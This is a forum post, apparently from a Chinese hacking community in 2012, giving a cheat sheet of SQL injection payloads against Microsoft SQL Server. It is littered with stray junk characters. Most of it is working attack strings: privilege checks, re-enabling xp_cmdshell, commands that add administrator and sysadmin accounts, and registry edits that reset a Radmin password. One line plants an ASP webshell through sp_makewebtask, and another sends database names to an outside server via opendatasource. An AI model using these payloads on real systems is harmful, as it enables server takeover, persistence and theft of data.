找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1851|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令% l. }8 C- s; g0 n
//看看是什么权限的
8 w2 C) c) z8 Q: \and 1=(Select IS_MEMBER('db_owner'))8 m' m$ t- n6 }* d1 h3 q; a
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
, b3 _* L( {" c
7 T1 E+ a8 A  p' b& G//检测是否有读取某数据库的权限5 {, |7 O+ r4 C; _0 u. n
and 1= (Select HAS_DBACCESS('master'))% o  D5 K3 p- A! n1 e! ]( Z
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
9 w$ s; ~5 V  D2 @4 E& V" k9 U
! l2 y7 l: q: i3 T7 L* Y7 B5 ]- S* f9 E7 l% X  ~/ \# ^& A
数字类型+ o0 \& T" V+ T2 \
and char(124)%2Buser%2Bchar(124)=0
. W5 K- Y2 l8 Q1 [% Y& I4 \0 j% N1 P
字符类型: u6 i5 ?) z  z0 `
' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 \8 l$ h& _/ ^" s' v
: }$ D1 _9 U0 m( }/ ]搜索类型# n" v% ]4 K- F' h- ~
' and char(124)%2Buser%2Bchar(124)=0 and '%'='% {1 d0 q2 q5 R
: W8 X6 j, @* G) H
爆用户名- Y) M$ ?8 w, L) }  @$ v+ p4 k$ D1 J
and user>0
* D4 C8 r6 y6 @# k# l9 M' ]' and user>0 and ''='
* G( v  e: W4 J1 j7 T3 f3 K5 N: Q  U0 f  y, E5 u! t
检测是否为SA权限
9 s* H+ Z# F3 l9 Q# c. M2 Yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
4 \. V5 N8 r4 L, ?: IAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- |& G1 l3 N7 [7 N( H; R& t. r% |4 N! t8 ?  w
检测是不是MSSQL数据库6 D6 E% j! {$ A7 _* {
and exists (select * from sysobjects);-- - s; c/ J" `$ Y
' w' l* z# C6 F4 V  v
检测是否支持多行5 o; z% k( J+ L6 N0 s% y8 H
;declare @d int;--
8 `" H' G+ {6 l% o9 ~# i" r7 a2 p% \- E+ R
恢复 xp_cmdshell6 B; d% j- }$ a' ]* Y
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
& I/ \& x  ~, ]/ D6 E9 n" W$ ?2 j( l! ?$ H0 B
( r2 Q) w- @3 x$ ]3 w" _) j: l* b
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
! }, j0 W4 \" S1 X
+ a. d1 i4 m3 n7 c& t; t//-----------------------* C9 X( @& Z6 z- i8 |- T
//      执行命令. V+ }3 [+ b+ }9 N/ ^6 O) T
//-----------------------
" \3 X' j/ j+ o, ~: s: C4 f首先开启沙盘模式:5 O7 a  P/ \- u/ A# ?
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  W5 u+ O, S1 |4 c, M- o, J% A* h- s# r3 T% _, m* G5 a
然后利用jet.oledb执行系统命令& K# z- A$ c( M' R4 v
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')  z; }6 h( a3 g# b7 C$ z6 `
& p# v, C6 o5 D3 f
执行命令
! P. n, ^8 W# p1 U: y$ x+ N;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 c0 Y3 C1 V. s8 d; q7 Q- W* ?5 e; Y8 Q7 M8 t8 }% Q
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111', C2 m$ \" x8 X" D) ~* [; D) t

0 Z0 z4 F, N5 ^( ?" s判断xp_cmdshell扩展存储过程是否存在:4 ?+ M" c& D( K  k* }) N, x3 P
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')4 F# r2 W  w: I3 ^

$ @8 c, {/ @7 ^4 }! b写注册表
4 b( o$ @' g3 ^( c, F& {1 ?4 `exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& [$ A8 x6 J  ~" B1 v7 m# H

3 e6 i$ S$ T4 ?* X* K( xREG_SZ* |7 w# y7 M: r# ]) Q3 i

! j; j" L) U' W) P读注册表/ f, b1 b+ U" d2 r3 A
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'8 L0 e7 q8 }% D' [: k4 O

* M$ L0 T/ Y3 j+ p! _读取目录内容% p0 @" t; s  o6 b, q) E. @# p4 x
exec master..xp_dirtree 'c:\winnt\system32\',1,1
* Q7 N& T: n5 g, x: v+ c) a& X4 ]) Q# Q* }# S. q

& l' T- p+ J+ P5 R# W# e数据库备份) E6 W" C4 m' r. f
backup database pubs to disk = 'c:\123.bak'
/ B* Y; E# X& b6 \7 ~
' E6 @2 w6 e4 Q1 W( \& T//爆出长度
, K( r3 S3 o7 f4 t3 IAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& _& f, X! n! y8 C  o9 v8 t* ^
) N5 V" u' H" B; c
6 k/ @5 Y& J  n: A0 j2 w( `) T
更改sa口令方法:用sql综合利用工具连接后,执行命令:
+ `! A5 M9 {: ?8 d( n& E' m6 }# Aexec sp_password NULL,'新密码','sa'8 X9 E2 o. T, V
# @6 k; ?3 x1 f, v$ i4 R& F& S% ^
添加和删除一个SA权限的用户test:
" A, m4 L$ ~9 V: qexec master.dbo.sp_addlogin test,ptlove
; Y+ g  w/ e$ aexec master.dbo.sp_addsrvrolemember test,sysadmin$ u. z/ f$ c9 g" h9 Q7 _

7 @) W. o  q' l8 H删除扩展存储过过程xp_cmdshell的语句: $ l! Q  D) l0 h* _. C3 ?: U
exec sp_dropextendedproc 'xp_cmdshell'' U- g' ^) V* `- l, `: X

) R( W( I. r3 O6 ?添加扩展存储过过程
; z: ~0 A) I: ], ^EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. I' P* K/ C+ \0 e9 X! AGRANT exec On xp_proxiedadata TO public : f6 M4 `% [: U, S
- D. c/ x" j" E$ R, Z
4 J, J& c# E/ H2 n6 k2 D: m
停掉或激活某个服务。
7 u; |) K# W$ m
* u& ?+ ]% p1 N$ @' zexec master..xp_servicecontrol 'stop','schedule'
7 X  C' U% c% J; T% hexec master..xp_servicecontrol 'start','schedule': o) p) ]) L$ `( f6 O
% s/ z* U! v0 a8 V
dbo.xp_subdirs
6 [% o6 i5 Y: m/ F: I
$ D/ b. Z3 q8 M+ A只列某个目录下的子目录。) g: `7 z! f1 |' A. h0 ]/ e3 l
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'- N7 f  s6 T+ E' m0 j+ _

  g' O  r- Q7 b( g2 p, ndbo.xp_makecab
8 J, q/ p% u" y  \5 B/ w9 ^
8 u. F* M$ A1 o1 t6 c1 ]将目标多个档案压缩到某个目标档案之内。
& ?7 V& p/ q% N% C! H# I所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
6 j( X0 \$ b8 x) T: N+ ~# v6 N4 b9 _
dbo.xp_makecab3 Y+ ?, }  b: V  n- [8 d
'c:\test.cab','mszip',1,5 b% W5 e8 i/ C/ M: M
'C:\Inetpub\wwwroot\SQLInject\login.asp',/ {4 z7 Y" I. v
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ R; ]) D& O+ i! W6 E# X4 g9 e4 l
; \( p. D' G. G" n) sxp_terminate_process# r  t% G8 o- b4 |  {
5 o  @) u0 X5 i( ]
停掉某个执行中的程序,但赋予的参数是 Process ID。4 z, [/ |1 _% H
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID8 g- u, ~2 m$ I/ O1 X

; d9 z0 u+ `: w5 ~+ f. S# g: m% Mxp_terminate_process 2484. x# `) [* @0 {/ s3 E
1 Y% l0 P3 A% Y9 N, k
xp_unpackcab. a! l. |7 O# z
$ w/ z5 H! q5 a3 m* [1 l$ n
解开压缩档。
* P' `- k  d( z0 v$ ^; x
9 t; K9 T* n! U% \xp_unpackcab 'c:\test.cab','c:\temp',1. w! N) D" w8 d! l

8 q6 t. k2 Z! o! d; q+ C
9 J+ X! N/ z1 `. x某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 j* e* Y2 J# W+ {( y9 s$ J" C8 p: x1 j( k
create database lcx;
( h) K- V, E1 ^" fCreate TABLE ku(name nvarchar(256) null);
; U# D/ X4 A7 ~: Y3 |+ I4 yCreate TABLE biao(id int NULL,name nvarchar(256) null);
& }9 k* G2 c9 @  a9 u! O4 K7 ^! s; [: d8 E6 a; k
//得到数据库名
8 b- ]& j. t2 U  y$ d" ]$ [8 rinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases% J7 M) W/ k1 S

1 q1 L; A. ^  j4 U5 X
7 \# O2 K  i+ _* \//在Master中创建表,看看权限怎样
/ k  N5 I6 X6 v+ NCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--( w/ [+ j/ H" I* l' B
: ~9 X/ e' `! b$ M- O  W  [0 d
用 sp_makewebtask直接在web目录里写入一句话马:  ?" c' f& q( r1 Q
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
. y' M: F& M/ e2 _% ^' z- l% V, e  Q, y6 C# C( V4 @; w
//更新表内容# w8 x2 O0 _* s, m* _
Update films SET kind = 'Dramatic' Where id = 123
. j1 b2 l, e/ c* S: V4 ~& O& E
+ y) j9 w  j8 ^, g- y+ b4 G//删除内容  K# j$ n- \; n! S/ |  |4 ]6 I
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表